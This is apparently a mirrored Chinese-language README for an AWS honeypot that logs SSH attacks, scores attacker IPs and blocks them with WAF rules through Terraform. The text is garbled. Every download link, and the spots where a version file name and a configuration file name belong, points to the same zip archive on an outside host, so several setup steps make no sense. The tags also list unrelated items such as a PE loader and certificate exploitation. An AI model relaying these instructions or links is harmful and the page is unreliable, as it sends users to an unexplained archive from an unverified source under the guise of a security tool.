Zidane109/cloud-honeypot-auto-block

GitHub: Zidane109/cloud-honeypot-auto-block

基于 AWS 的自动化蜜罐防御系统,通过 SSH 陷阱捕获攻击、评分恶意 IP 并联动 WAF 自动封禁。

Stars: 1 | Forks: 0

# 🔐 cloud-honeypot-auto-block - 保护您的云环境免受入侵 [![下载最新版本](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip)](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip) ## 📋 什么是 cloud-honeypot-auto-block? cloud-honeypot-auto-block 是一款旨在自动保护您云基础设施的 AWS 安全工具。它通过虚假的 SSH 陷阱捕获针对您服务器的黑客尝试,对可疑 IP 地址进行评分,跟踪其信誉,然后使用 AWS 的防火墙拦截恶意行为者。所有这些步骤在设置完成后无需您过多干预即可自动发生。 该系统在您的 AWS 账户内运行。它使用多种 AWS 组件,如 Lambda(用于在无需管理服务器的情况下运行代码)、DynamoDB(用于存储数据)、CloudWatch(用于监控)和 WAF (Web Application Firewall) 来保护您的云资源安全。该设置通过 Terraform 进行管理,确保您的防火墙规则和监控保持一致。 ## ⚙️ 系统要求 在安装 cloud-honeypot-auto-block 之前,请确保您具备以下条件: - 一个具有创建和管理资源(如 Lambda 函数、DynamoDB 表、WAF 规则和 CloudWatch 日志)权限的 AWS 账户。 - 对 AWS Management Console 有基本了解。 - 本地计算机上已安装 Terraform(1.0 或更高版本)。Terraform 有助于自动设置所有必要的资源。 - 一台运行 Windows、macOS 或 Linux 的计算机,用于执行 Terraform 命令。 - 互联网连接,用于下载应用程序文件并与 AWS 服务通信。 ## 📥 下载与安装 首先,您需要访问发布页面并下载安装所需的最新文件。 **步骤 1:访问发布页面** 点击顶部的大按钮或[访问此页面进行下载](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip)。 **步骤 2:下载最新版本** 寻找最新的版本(通常以版本号命名),并下载包含 Terraform 模板和文档的 `.zip` 或 `https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip` 文件。 **步骤 3:解压文件** 下载完成后,将压缩文件解压到您计算机上的一个文件夹中。此文件夹包含运行该工具所需的所有脚本和说明。 **步骤 4:设置 Terraform 和 AWS CLI** - 在终端或命令提示符中运行 `terraform version`,确保已安装 Terraform。 - 如果尚未安装和配置 AWS CLI,请完成此操作。运行 `aws configure` 并在提示时输入您的 AWS 凭证。 **步骤 5:初始化 Terraform** 打开命令提示符或终端,导航到解压后的文件夹,然后运行: ``` terraform init ``` 此命令会下载必要的模块和 provider。 **步骤 6:检查配置** 编辑 `https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip` 或提供的配置文件,以设置您的 AWS 区域以及任何其他设置,例如阻止 IP 的阈值。 **步骤 7:应用 Terraform 配置** 运行以下命令来创建 AWS 资源: ``` terraform apply ``` 在流程开始之前,系统会要求您确认。输入 `yes` 并按 Enter 键。 Terraform 随后将创建系统运行所需的 Lambda 函数、DynamoDB 表、CloudWatch 警报和 WAF 规则。 ## 🛠 工作原理 cloud-honeypot-auto-block 利用一系列 AWS 服务来检测和拦截恶意 IP 地址。 1. **蜜罐 SSH 遥测:** 该工具使用伪装成 SSH 服务器的安全蜜罐。攻击者尝试连接这些虚假服务器并进行交互,从而产生日志。 2. **Lambda 评分:** AWS Lambda 函数自动分析这些日志以查找可疑活动。 3. **DynamoDB 信誉数据库:** 可疑 IP 地址会根据其行为模式被赋予信誉评分并存储在 DynamoDB 中。 4. **自动拦截:** 如果评分超过设定限制,由 Terraform 管理的 WAF 规则会更新,以拦截这些 IP 访问您的云资源。 5. **持续监控:** CloudWatch 警报会针对新威胁或采取的拦截操作通知您。 总体而言,此过程减少了人工干预,有助于保持您的 AWS 环境更安全。 ## 🖥 用户界面 该工具没有像网页或应用程序那样的传统用户界面。相反,所有操作都在您的 AWS 控制台和终端中进行。 - 使用 AWS Management Console 查看工具创建的日志和资源。 - 使用终端或命令提示符运行 Terraform 命令。 - CloudWatch 将根据安全事件发送警报,您可以将其配置为路由到电子邮件或其他联系方式。 ## 📚 附加配置 您可以根据需要自定义 cloud-honeypot-auto-block: - 通过编辑 Lambda 函数参数**调整评分灵敏度**。 - **设置 IP 封禁持续时间**,以决定被拦截地址的封禁时长。 - **与其他通知系统集成**,如 SNS 或 Slack 用于接收警报。 - **扩展蜜罐**,使其超出 SSH 范围以诱捕其他协议。 请查看发布包中的配置文件和注释以获取详细说明。 ## 🔐 安全与隐私 该工具仅在您的 AWS 环境内运行。它收集尝试对您控制的蜜罐进行未经授权访问的 IP 地址。 - 没有任何外部数据流出您的 AWS 账户。 - AWS 负责处理所有资源的安全性。 - 请确保您的 AWS 凭证保密且安全。 ## ❓ 故障排除 如果出现问题: - 确认 Terraform 和 AWS CLI 已正确安装。 - 仔细检查您在 AWS 中是否拥有适当的权限。 - 查看终端中的输出消息以获取错误提示。 - 检查 CloudWatch 日志以查找 Lambda 函数错误。 - 访问 GitHub 页面上的 Issues 部分以获取已知问题和帮助。 ## 📝 主题与标签 该项目涵盖: `aws` | `cloud-security` | `cloudwatch` | `devsecops` | `dynamodb` | `honeypot` | `infrastructure-as-code` | `lambda` | `soc` | `terraform` | `waf` 这些标签代表了所使用的主要技术和涉及的安全概念。 ## 👋 需要帮助? 如果您有问题或想要报告问题,请使用 GitHub 仓库的 Issues 部分。社区和维护者可以在那里为您提供帮助。
标签:AWS, CISA项目, CloudWatch, DPI, DynamoDB, ECS, IP信誉, Lambda, PE 加载器, Serverless, SSH陷阱, Terraform, WAF, 入侵防御, 基础架构即代码, 威胁情报, 开发者工具, 恶意IP检测, 网络安全, 自动封禁, 蜜罐, 证书利用, 逆向工具, 防御自动化, 隐私保护